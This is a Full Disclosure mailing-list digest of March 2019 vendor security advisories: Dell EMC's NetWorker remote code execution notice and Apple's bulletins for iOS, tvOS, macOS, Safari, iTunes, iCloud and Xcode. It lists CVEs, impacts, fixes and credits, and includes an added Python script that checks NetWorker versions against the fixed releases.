[FD] ESA-2017-123: EMC Networker Remote Code Execution Vulnerability

2019-03-26 Thread secure
Restricted - Confidential

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

ESA-2017-123: EMC Networker Remote Code Execution Vulnerability

EMC Identifier: ESA-2017-123

CVE Identifier: CVE-2017-8023

Severity Rating: CVSSv3 Base Score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected products:
EMC NetWorker versions 8.2.x
EMC NetWorker versions 9.0.x
EMC NetWorker versions prior to 9.1.1.5
EMC NetWorker versions prior to 9.2.1


Summary:
EMC NetWorker includes an unauthenticated remote code execution vulnerability 
that may potentially be exploited by malicious users to compromise the affected 
system.

Details:
EMC NetWorker may potentially be vulnerable to an unauthenticated remote code 
execution vulnerability in the NetWorker client execution service (nsrexecd) 
when the oldauth authentication method is used. An unauthenticated remote 
attacker could send arbitrary commands via the RPC service to be executed on 
the host system with the privileges of the nsrexecd service, which runs with 
administrative privileges.

Resolution:
The following EMC NetWorker releases address this vulnerability:
EMC NetWorker 9.1.1.5
EMC NetWorker 9.2.1
EMC NetWorker 8.2.4.11
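As an added illustration (not part of the EMC advisory and not EMC's code), the following Python snippet classifies a NetWorker version string against the affected and fixed releases listed above. The version ranges are copied from the advisory; the treatment of branches the advisory does not mention (reported as "not covered" rather than guessed at) and the sample inventory are this example's own assumptions.

```python
import re

# Lowest fixed build per release branch, per "Resolution:" in ESA-2017-123.
# 9.0.x has no entry here: the advisory lists every 9.0.x release as
# affected and names no fixed 9.0 build.
FIXED_BUILDS = {
    (8, 2): (8, 2, 4, 11),
    (9, 1): (9, 1, 1, 5),
    (9, 2): (9, 2, 1),
}
AFFECTED_WITHOUT_FIX = {(9, 0)}


def parse_version(text):
    """Turn '9.1.1.5' into (9, 1, 1, 5); reject anything that is not dotted digits."""
    text = text.strip()
    if not re.fullmatch(r"\d+(?:\.\d+)*", text):
        raise ValueError(f"not a dotted version string: {text!r}")
    return tuple(int(part) for part in text.split("."))


def compare(a, b):
    """Compare version tuples with zero-padding so that 9.2.1 == 9.2.1.0."""
    width = max(len(a), len(b))
    a = a + (0,) * (width - len(a))
    b = b + (0,) * (width - len(b))
    return (a > b) - (a < b)


def classify(text):
    """Return 'vulnerable', 'fixed' or 'not covered' for one version string."""
    version = parse_version(text)
    if len(version) < 2:
        return "not covered"
    branch = version[:2]
    if branch in AFFECTED_WITHOUT_FIX:
        return "vulnerable"
    if branch in FIXED_BUILDS:
        return "fixed" if compare(version, FIXED_BUILDS[branch]) >= 0 else "vulnerable"
    # Branches the advisory does not list (e.g. 8.1.x or 10.x) are left for a
    # human to check against the vendor rather than guessed at (assumption).
    return "not covered"


def audit(inventory):
    """Map host -> verdict for a dict of host -> version string."""
    return {host: classify(ver) for host, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed sample inventory; the host names are placeholders.
    sample = {
        "bkp-client-01": "9.1.1.4",
        "bkp-client-02": "9.1.1.5",
        "bkp-client-03": "9.2.0.3",
        "bkp-client-04": "8.2.4.11",
        "bkp-client-05": "9.0.1.2",
    }
    for host, verdict in audit(sample).items():
        print(f"{host}: {sample[host]} -> {verdict}")
```

The zero-padding in `compare` matters because the advisory names fixes with different numbers of components (9.2.1 versus 9.1.1.5); without it, 9.2.1.0 would sort after 9.2.1 and be misreported. A build that is not on any of the listed branches is deliberately not marked safe, since the advisory says nothing about it.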

The two options below can be used as a workaround:

1. Use nsrauth exclusively and do not allow a fallback to oldauth.
2. For customers who must use oldauth, ensure all 'servers' files are properly 
configured and review the "Restricting remote program executions and 
client-tasking rights" section in the EMC NetWorker Security Configuration 
Guide for how to update the servers file.

EMC recommends that all customers upgrade at the earliest opportunity. Oldauth 
is an insecure authentication mode and is supported for compatibility purposes 
only. EMC strongly recommends that customers use nsrauth exclusively in their 
environment. See the EMC NetWorker Security Configuration Guides listed below 
for additional information:

https://support.emc.com/docu57698_NetWorker-8.2--Security-Configuration-Guide.pdf
https://support.emc.com/docu61097_NetWorker_9.0.x_Security_Configuration_Guide.pdf
https://support.emc.com/docu81539_NetWorker-9.1.x-Security-Configuration-Guide.pdf
https://support.emc.com/docu85867_NetWorker-9.2-Security-Configuration-Guide.pdf

Link to remedies:
Customers can download software from two different locations:

For EMC NetWorker version 9.1.1: 
https://support.emc.com/docu86749_NetWorker,-NVE,-NVP-and-Modules-9.1.1-Cumulative-Hotfixes.pdf
For EMC NetWorker version 9.2.1: 
https://support.emc.com/downloads/1095_NetWorker
For EMC NetWorker version 8.2.4.11: 
https://support.emc.com/docu81710_NetWorker-and-NMM-8.2.4-Cumulative-Hotfixes.pdf

Severity Rating:
For an explanation of Severity Ratings, refer to Dell EMC Knowledgebase article 
468307. Dell EMC recommends that all customers take into account both the base 
score and any relevant temporal and environmental scores which may affect the 
potential severity associated with a particular security vulnerability.

Legal Information:
Read and use the information in this Dell EMC Security Advisory to assist in 
avoiding any situation that might arise from the problems described herein. If 
you have any questions regarding this product alert, contact Dell EMC Software 
Technical Support at 1-877-534-2867. Dell EMC distributes Dell EMC Security 
Advisories in order to bring important security information to the attention 
of users of the affected Dell EMC products. Dell EMC recommends that all 
users determine the applicability of this information to their individual 
situations and take appropriate action. The information set forth herein is 
provided "as is" without warranty of any kind. Dell EMC disclaims all 
warranties, either express or implied, including the warranties of 
merchantability, fitness for a particular purpose, title and non-infringement. 
In no event shall Dell EMC or its suppliers be liable for any damages 
whatsoever including direct, indirect, incidental, consequential, loss of 
business profits or special damages, even if Dell EMC or its suppliers have 
been advised of the 
possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for consequential or incidental damages, so the 
foregoing limitation may not apply.
-BEGIN PGP SIGNATURE-
[FD] APPLE-SA-2019-3-25-1 iOS 12.2

2019-03-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-2019-3-25-1 iOS 12.2

iOS 12.2 is now available and addresses the following:

CFString
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted string may lead to a denial
of service
Description: A validation issue was addressed with improved logic.
CVE-2019-8516: SWIPS Team of Frifee Inc.

configd
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8552: Mohamed Ghannam (@_simo36)

Contacts
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2019-8511: an anonymous researcher

CoreCrypto
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

Exchange ActiveSync
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A user may authorize an enterprise administrator to remotely
wipe their device without appropriate disclosure
Description: This issue was addressed with improved transparency.
CVE-2019-8512: an anonymous researcher, an anonymous researcher

FaceTime
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A user's video may not be paused in a FaceTime call if they
exit the FaceTime app while the call is ringing
Description: An issue existed in the pausing of FaceTime video. The
issue was resolved with improved logic.
CVE-2019-8550: Lauren Guzniczak of Keystone Academy

Feedback Assistant
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to gain root privileges
Description: A race condition was addressed with additional
validation.
CVE-2019-8565: CodeColorist of Ant-Financial LightYear Labs

Feedback Assistant
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to overwrite arbitrary
files
Description: This issue was addressed with improved checks.
CVE-2019-8521: CodeColorist of Ant-Financial LightYear Labs

file
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted file might disclose user
information
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-6237: an anonymous researcher

GeoServices
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Clicking a malicious SMS link may lead to arbitrary code
execution
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8553: an anonymous researcher

iAP
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

IOHIDFamily
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to cause unexpected system
termination or read kernel memory
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team

IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8504: an anonymous researcher

IOKit SCSI
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2019-8529: Juwei Lin (@panicaII) of Trend Micro

Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A remote attacker may be able to cause unexpected system
termination or corrupt kernel memory
Description: A buffer overflow was addressed with improved size
validation.
CVE-2019-8527: Ned Williamson of Google and derrek (@derrekr6)

Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to gain elevated privileges
Description: A logic issue was addressed with improved state
management.
CVE-2019-8514: Samuel Groß of Google 

[FD] APPLE-SA-2019-3-25-6 iCloud for Windows 7.11

2019-03-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-2019-3-25-6 iCloud for Windows 7.11

iCloud for Windows 7.11 is now available and addresses the following:

CoreCrypto
Available for: Windows 7 and later
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

iTunes
Available for: Windows 7 and later
Impact: Running the iTunes installer in an untrusted directory may
result in arbitrary code execution
Description: A race condition existed during the installation of
iTunes for Windows. This was addressed with improved state handling.
CVE-2019-6232: Stefan Kanthak (eskamation.de)

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A type confusion issue was addressed with improved
memory handling.
CVE-2019-8506: Samuel Groß of Google Project Zero

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8535: Zhiyang Zeng (@Wester) of Tencent Blade Team

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-6201: dwfault working with ADLab of Venustech
CVE-2019-8518: Samuel Groß of Google Project Zero
CVE-2019-8523: Apple
CVE-2019-8524: G. Geshev working with Trend Micro Zero Day Initiative
CVE-2019-8558: Samuel Groß of Google Project Zero
CVE-2019-8559: Apple
CVE-2019-8563: Apple

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may disclose
sensitive user information
Description: A cross-origin issue existed with the fetch API. This
was addressed with improved input validation.
CVE-2019-8515: James Lee (@Windowsrcer)

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8536: Apple
CVE-2019-8544: an anonymous researcher

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2019-7285: dwfault working at ADLab of Venustech
CVE-2019-8556: Apple

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may result in the
disclosure of process memory
Description: A validation issue was addressed with improved logic.
CVE-2019-7292: Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team

WebKit
Available for: Windows 7 and later
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A logic issue was addressed with improved validation.
CVE-2019-8503: Linus Särud of Detectify

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved validation.
CVE-2019-8551: Ryan Pickren (ryanpickren.com)

Windows Installer
Available for: Windows 7 and later
Impact: Running the iCloud installer in an untrusted directory may
result in arbitrary code execution
Description: A race condition existed during the installation of
iCloud for Windows. This was addressed with improved state handling.
CVE-2019-6236: Stefan Kanthak (eskamation.de)

Additional recognition

Safari
We would like to acknowledge Nikhil Mittal (@c0d3G33k) of Payatu Labs
(payatu.com) for their assistance.

WebKit
We would like to acknowledge Andrey Kovalev of Yandex Security Team
for their assistance.

Installation note:

iCloud for Windows 7.11 may be obtained from:
https://support.apple.com/HT204283

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-
[FD] APPLE-SA-2019-3-25-3 tvOS 12.2

2019-03-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-2019-3-25-3 tvOS 12.2

tvOS 12.2 is now available and addresses the following:

CFString
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: Processing a maliciously crafted string may lead to a denial
of service
Description: A validation issue was addressed with improved logic.
CVE-2019-8516: SWIPS Team of Frifee Inc.

configd
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to elevate privileges
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8552: Mohamed Ghannam (@_simo36)

CoreCrypto
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

file
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: Processing a maliciously crafted file might disclose user
information
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-6237: an anonymous researcher

Foundation
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to gain elevated privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2019-7286: an anonymous researcher, Clement Lecigne of Google
Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel
Groß of Google Project Zero

GeoServices
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: Clicking a malicious SMS link may lead to arbitrary code
execution
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8553: an anonymous researcher

iAP
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

IOHIDFamily
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A local user may be able to cause unexpected system
termination or read kernel memory
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team

Kernel
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A remote attacker may be able to cause unexpected system
termination or corrupt kernel memory
Description: A buffer overflow was addressed with improved size
validation.
CVE-2019-8527: Ned Williamson of Google and derrek (@derrekr6)

Kernel
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to determine kernel
memory layout
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8540: Weibo Wang (@ma1fan) of Qihoo 360 Nirvan Team

Kernel
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to gain elevated privileges
Description: A logic issue was addressed with improved state
management.
CVE-2019-8514: Samuel Groß of Google Project Zero

Kernel
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A local user may be able to read kernel memory
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-7293: Ned Williamson of Google

Kernel
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to determine kernel
memory layout
Description: An out-of-bounds read issue existed that led to the
disclosure of kernel memory. This was addressed with improved input
validation.
CVE-2019-6207: Weibo Wang of Qihoo 360 Nirvan Team (@ma1fan)
CVE-2019-8510: Stefan Esser of Antid0te UG

Power Management
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to execute arbitrary code
with system privileges
Description: Multiple input validation issues existed in MIG
generated code. These issues were addressed with improved validation.
CVE-2019-8549: Mohamed Ghannam (@_simo36) of SSD Secure Disclosure
(ssd-disclosure.com)

Siri
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to initiate a Dictation
request without user authorization
Description: An API issue existed in the handling of dictation
requests. This issue was addressed with improved validation.
CVE-2019-8502: Luke Deshotels of North Carolina State University,
Jordan Beichler of North Carolina State University, William Enck of
North Carolina State University, Costin Carabaș of University
POLITEHNICA of Bucharest, and Răzvan Deaconescu of University
POLITEHNICA of Bucharest

TrueTypeScaler
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: Processing a maliciously crafted font may result in the
disclosure of process memory
Description: An out-of

[FD] APPLE-SA-2019-3-25-5 iTunes 12.9.4 for Windows

2019-03-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-2019-3-25-5 iTunes 12.9.4 for Windows

iTunes 12.9.4 for Windows is now available and addresses the
following:

CoreCrypto
Available for: Windows 7 and later
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A type confusion issue was addressed with improved
memory handling.
CVE-2019-8506: Samuel Groß of Google Project Zero

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8535: Zhiyang Zeng (@Wester) of Tencent Blade Team

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-6201: dwfault working with ADLab of Venustech
CVE-2019-8518: Samuel Groß of Google Project Zero
CVE-2019-8523: Apple
CVE-2019-8524: G. Geshev working with Trend Micro Zero Day Initiative
CVE-2019-8558: Samuel Groß of Google Project Zero
CVE-2019-8559: Apple
CVE-2019-8563: Apple

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may disclose
sensitive user information
Description: A cross-origin issue existed with the fetch API. This
was addressed with improved input validation.
CVE-2019-8515: James Lee (@Windowsrcer)

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8536: Apple
CVE-2019-8544: an anonymous researcher

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2019-7285: dwfault working at ADLab of Venustech
CVE-2019-8556: Apple

WebKit
Available for: Windows 7 and later
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A logic issue was addressed with improved validation.
CVE-2019-8503: Linus Särud of Detectify

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may result in the
disclosure of process memory
Description: A validation issue was addressed with improved logic.
CVE-2019-7292: Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team

WebKit
Available for: Windows 7 and later
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8562: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of
Chaitin Security Research Lab

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved validation.
CVE-2019-8551: Ryan Pickren (ryanpickren.com)

Additional recognition

Safari
We would like to acknowledge Nikhil Mittal (@c0d3G33k) of Payatu Labs
(payatu.com) for their assistance.

WebKit
We would like to acknowledge Andrey Kovalev of Yandex Security Team
for their assistance.

Installation note:

iTunes 12.9.4 for Windows may be obtained from:
https://www.apple.com/itunes/download/

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-

iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlyZM7kpHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3Ec0RAA
nGDG01Ralu3vmvx1OPEfY1Ebf770lEYbG1Fb7ZE13iaSKFaPu4S3R2bpRAwjz4eV
3u2Q75tKuQhntOeuxwdhXC95/Udeh45m+BN03yqDlK3qBohTqCl1VGAch5aLc52V
g+BOIGP/+NW3MqveRE9WoDF8TO021cjKmrtRqlF022dSZihRS6mXHHB5x2Uj9Jaq
hIFdFXu/EO0O3VHaoHSCmfpiA5SJqSoNZJJDdwjh9acj2/cIFcdbhhR6IE3MufAh
7O6IDWt8h95wqhJubK8dKkIDpKBSILqNxrslpoCt8OntCk5P64RlGUDcAXGLm8Tt
1imDpIK6Dr4VFQ0nYHx1xhq0gGMPEzUSW/W8j9tMO3TISlY+1632Sp7fP9tFMfyp
tTmv+kucifAA7yGMxZXh7d9WnkvzY6AkHJ/VwiGexemUDxBGsYSAtbZPmwbfkypl
IQ0Eg8hV6VqG7qNIq6ePuruBxtwjjZcx8p8uOUQj8uSsG8aSYxHUOoWa4idY7APg
absij97ZRrXC6OSjmoyNUAwgmmwhOm2hNXErnK0YURFeamPcyvqzTamAy6GmCvhz
WZGax0M0v7KOpPEEbJUVjJ7rN8g1v7gaY0LTqobjMWRk6+pXeSJ9loO0p682Gkt3
pvl90xARoY+d9ywFQ6Z3XawFQ8PJokCkPrzvjj+SlZk=
=NF9p
-END PGP SIGNATURE-

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] APPLE-SA-2019-3-25-7 Xcode 10.2

2019-03-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-2019-3-25-7 Xcode 10.2

Xcode 10.2 is now available and addresses the following:

Kernel
Available for: macOS 10.13.6 or later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4461: Ian Beer of Google Project Zero

Installation note:

Xcode 10.2 may be obtained from:

https://developer.apple.com/xcode/downloads/

To check that the Xcode has been updated:

* Select Xcode in the menu bar
* Select About Xcode
* The version after applying this update will be "10.2".

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-
=gqgW
-END PGP SIGNATURE-

[FD] APPLE-SA-2019-3-25-4 Safari 12.1

2019-03-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-2019-3-25-4 Safari 12.1

Safari 12.1 is now available and addresses the following:

Safari Reader
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Enabling the Safari Reader feature on a maliciously crafted
webpage may lead to universal cross site scripting
Description: A logic issue was addressed with improved validation.
CVE-2019-6204: Ryan Pickren (ryanpickren.com)
CVE-2019-8505: Ryan Pickren (ryanpickren.com)

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A type confusion issue was addressed with improved
memory handling.
CVE-2019-8506: Samuel Groß of Google Project Zero

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8535: Zhiyang Zeng (@Wester) of Tencent Blade Team

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-6201: dwfault working with ADLab of Venustech
CVE-2019-8518: Samuel Groß of Google Project Zero
CVE-2019-8523: Apple
CVE-2019-8524: G. Geshev working with Trend Micro Zero Day Initiative
CVE-2019-8558: Samuel Groß of Google Project Zero
CVE-2019-8559: Apple
CVE-2019-8563: Apple

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may disclose
sensitive user information
Description: A cross-origin issue existed with the fetch API. This
was addressed with improved input validation.
CVE-2019-8515: James Lee (@Windowsrcer)

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8536: Apple
CVE-2019-8544: an anonymous researcher

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2019-7285: dwfault working at ADLab of Venustech
CVE-2019-8556: Apple

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A logic issue was addressed with improved validation.
CVE-2019-8503: Linus Särud of Detectify

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may result in the
disclosure of process memory
Description: A validation issue was addressed with improved logic.
CVE-2019-7292: Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8562: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of
Chaitin Security Research Lab

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved validation.
CVE-2019-8551: Ryan Pickren (ryanpickren.com)

Additional recognition

Safari
We would like to acknowledge Nikhil Mittal (@c0d3G33k) of Payatu Labs
(payatu.com) for their assistance.

WebKit
We would like to acknowledge Andrey Kovalev of Yandex Security Team
for their assistance.

Installation note:

Safari 12.1 may be obtained from the Mac App Store.

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-

iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlyZM7kpHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3F9mw//
eDj85xvN64fiki5XR1Toh6Ef4mNoVtRjiwD9f7SAKK7j384eP2BXSkScKv6Y1U7M
Vd07rBluq9Lw/CEq9Vwu/a2yOa22ilTy4q2O36rXoJ5LC0O4xjmoXN2M72mbPFqn
7vDmQTZ8/AxZQF3D57d+cMrdxKZbQ1wNJRQhRUrnNe8VSwwZ2GtHTJ+PnIeq93yb
i6uewLWhkfObOrPH4uyx/v3N1ZxfC5S9mSNBLio1C7iQpObBfYt7JlioZZMqiD2d
zqV+DBJEmycaANFngC/VDAR1PH/C/h1kEYJotRKUCVucnceptE/3HT0CtE+wFQCU
rg

[FD] APPLE-SA-2019-3-25-2 macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra

2019-03-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-2019-3-25-2 macOS Mojave 10.14.4, Security Update
2019-002 High Sierra, Security Update 2019-002 Sierra

macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, and
Security Update 2019-002 Sierra are now available and
address the following:

AppleGraphicsControl
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A buffer overflow was addressed with improved size
validation.
CVE-2019-8555: Zhiyi Zhang of 360 ESG Codesafe Team, Zhuo Liang and
shrek_wzw of Qihoo 360 Nirvan Team

Bom
Available for: macOS Mojave 10.14.3
Impact: A malicious application may bypass Gatekeeper checks
Description: This issue was addressed with improved handling of file
metadata.
CVE-2019-6239: Ian Moorhouse and Michael Trimm

CFString
Available for: macOS Mojave 10.14.3
Impact: Processing a maliciously crafted string may lead to a denial
of service
Description: A validation issue was addressed with improved logic.
CVE-2019-8516: SWIPS Team of Frifee Inc.

configd
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to elevate privileges
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8552: Mohamed Ghannam (@_simo36)

Contacts
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2019-8511: an anonymous researcher

CoreCrypto
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

